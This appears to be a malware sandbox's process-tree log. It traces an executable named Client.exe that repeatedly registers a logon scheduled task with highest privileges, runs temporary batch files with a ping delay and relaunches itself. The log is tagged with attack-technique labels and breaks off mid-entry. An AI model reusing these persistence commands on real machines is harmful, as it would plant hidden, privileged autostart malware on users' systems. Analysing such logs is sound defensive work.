        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2848
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1w0Oaoiawh0E.bat" "
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:1416
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        10⤵
        
        PID:2488
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1820
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2044
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        11⤵
        
        PID:1816
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FhTTTFRlnNPv.bat" "
        11⤵
        
        PID:4848
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        12⤵
        System Location Discovery: System Language Discovery
        
        PID:4628
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2816
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        12⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2000
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        13⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4712
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qLSO7q5Q4viY.bat" "
        13⤵
        
        PID:1932
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        14⤵
        
        PID:1872
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        14⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1444
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        14⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2412
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        15⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1064
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BJsM7wthPBdU.bat" "
        15⤵
        
        PID:3060
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        16⤵
        System Location Discovery: System Language Discovery
        
        PID:4456
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        16⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2816
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        16⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5060
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        17⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:3424
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\31QqSuPm7sVY.bat" "
        17⤵
        
        PID:2532
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        18⤵
        System Location Discovery: System Language Discovery
        
        PID:1444
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        18⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3416
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        18⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:860
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        19⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1108
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TKTwTlEzDvts.bat" "
        19⤵
        System Location Discovery: System Language Discovery
        
        PID:2952
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        20⤵
        
        PID:2920
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        20⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3416
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        20⤵
        Executes dropped EXE
        
        PID:4104
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        21⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1028
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xqfCpYxxGk5X.bat" "
        21⤵
        
        PID:3600
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        22⤵
        
        PID:860
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        22⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4100
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        22⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4128
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        23⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1528
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FnIR2ubu4CJZ.bat" "
        23⤵
        
        PID:828
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        24⤵
        
        PID:3088
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        24⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3888
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        24⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4980
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        25⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:724
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XlufFGFrseWb.bat" "
        25⤵
        
        PID:2952
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        26⤵
        
        PID:4536
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        26⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2036
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        26⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1820
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        27⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:608
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        28⤵
        
        PID:4264
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cAwsKAmmSil1.bat" "
        27⤵
        
        PID:4804
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        28⤵
        
        PID:1992
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        28⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2328
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        28⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2308
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        29⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:1632
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        30⤵
        
        PID:3584
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6g88gxWlVYxg.bat" "
        29⤵
        
        PID:1964
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        30⤵
        
        PID:4016
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        30⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4628
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        30⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1112
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        31⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2036
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        32⤵
        
        PID:1632
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ATLE11vO4gfw.bat" "
        31⤵
        System Location Discovery: System Language Discovery
        
        PID:3876
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        32⤵
        
        PID:196
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        32⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:696
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        32⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5012
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        33⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2476
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LJAovZefePm0.bat" "
        33⤵
        
        PID:2520
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        34⤵
        
        PID:1232
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        34⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4636
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        34⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2936
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        35⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2964
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\W8zOq6NvE9t5.bat" "
        35⤵
        
        PID:1164
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        36⤵
        System Location Discovery: System Language Discovery
        
        PID:4832
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        36⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3912
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        36⤵
        Adds Run key to start application
        Suspicious use of AdjustPrivilegeToken
        
        PID:3784
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        37⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2476
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AAXDavEyBZdl.bat" "
        37⤵
        
        PID:5532
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        38⤵
        System Location Discovery: System Language Discovery
        
        PID:488
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        38⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5552
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        38⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2116
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        39⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6868
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oGpV8PrSV7Nt.bat" "
        39⤵
        
        PID:6924
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        40⤵
        
        PID:6976
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        40⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6992
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        40⤵
        
        PID:5652
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        41⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6292
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\v4qLGCQPZ3m4.bat" "
        41⤵
        
        PID:7060
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        42⤵
        
        PID:7088
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        42⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:7028
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        42⤵
        
        PID:5340
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        43⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5800
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fFbXFT0mZANP.bat" "
        43⤵
        
        PID:4484
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        44⤵
        
        PID:5696
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        44⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5944
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        44⤵
        System Location Discovery: System Language Discovery
        
        PID:4064
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        45⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4292
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2A6jA7cazLJg.bat" "
        45⤵
        
        PID:2504
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        46⤵
        
        PID:4276
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        46⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6136
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        46⤵
        
        PID:4664
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        47⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2532
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B3r5A7WJTAOP.bat" "
        47⤵
        
        PID:4968
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        48⤵
        
        PID:6080
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        48⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:440
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        48⤵
        
        PID:5056
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        49⤵
        
        PID:6936
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tyYMj11TbQCk.bat" "
        49⤵
        
        PID:4200
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        50⤵
        
        PID:6372
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        50⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6416
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        50⤵
        
        PID:6236
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        51⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2300
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VOG4kzjEXuQG.bat" "
        51⤵
        
        PID:6884
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        52⤵
        
        PID:6604
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        52⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2800
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        52⤵
        
        PID:5632
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        53⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6348
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YrJO8V0nHB9d.bat" "
        53⤵
        
        PID:6180
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        54⤵
        
        PID:5668
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        54⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5276
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        54⤵
        
        PID:2656
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        55⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5344
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1vbELwXIv4Cs.bat" "
        55⤵
        
        PID:2648
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        56⤵
        
        PID:6852
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        56⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4652
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        56⤵
        
        PID:5792
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        57⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3104
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DSQ6jfztjqYG.bat" "
        57⤵
        
        PID:4536
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        58⤵
        
        PID:3088
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        58⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6276
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        58⤵
        
        PID:5936
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        59⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6988
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AKf1Ttb7aLWx.bat" "
        59⤵
        
        PID:2968
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        60⤵
        
        PID:1408
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        60⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6824
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        60⤵
        
        PID:6988
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        61⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2800
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MmKi8ISfC19B.bat" "
        61⤵
        
        PID:4844
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        62⤵
        
        PID:3152
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        62⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2300
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        62⤵
        
        PID:1552
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        63⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:220
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5w5u7Z22C9kW.bat" "
        63⤵
        
        PID:6848
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        64⤵
        
        PID:7100
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        64⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6340
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        64⤵
        
        PID:6608
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        65⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5844
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WRTQgcchjAFH.bat" "
        65⤵
        
        PID:6988
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        66⤵
        
        PID:1696
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        66⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3728
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        66⤵
        
        PID:5892
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        67⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3288
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\y0bS7rX7g5Pb.bat" "
        67⤵
        
        PID:6604
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        68⤵
        
        PID:6836
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        68⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4736
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        68⤵
        
        PID:6424
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        69⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2296
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5Mht7JtbM4gM.bat" "
        69⤵
        
        PID:1932
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        70⤵
        
        PID:7156
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        70⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3268
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        70⤵
        
        PID:2996
        
        C:\Windows\SysWOW64\schtasks.exe
        
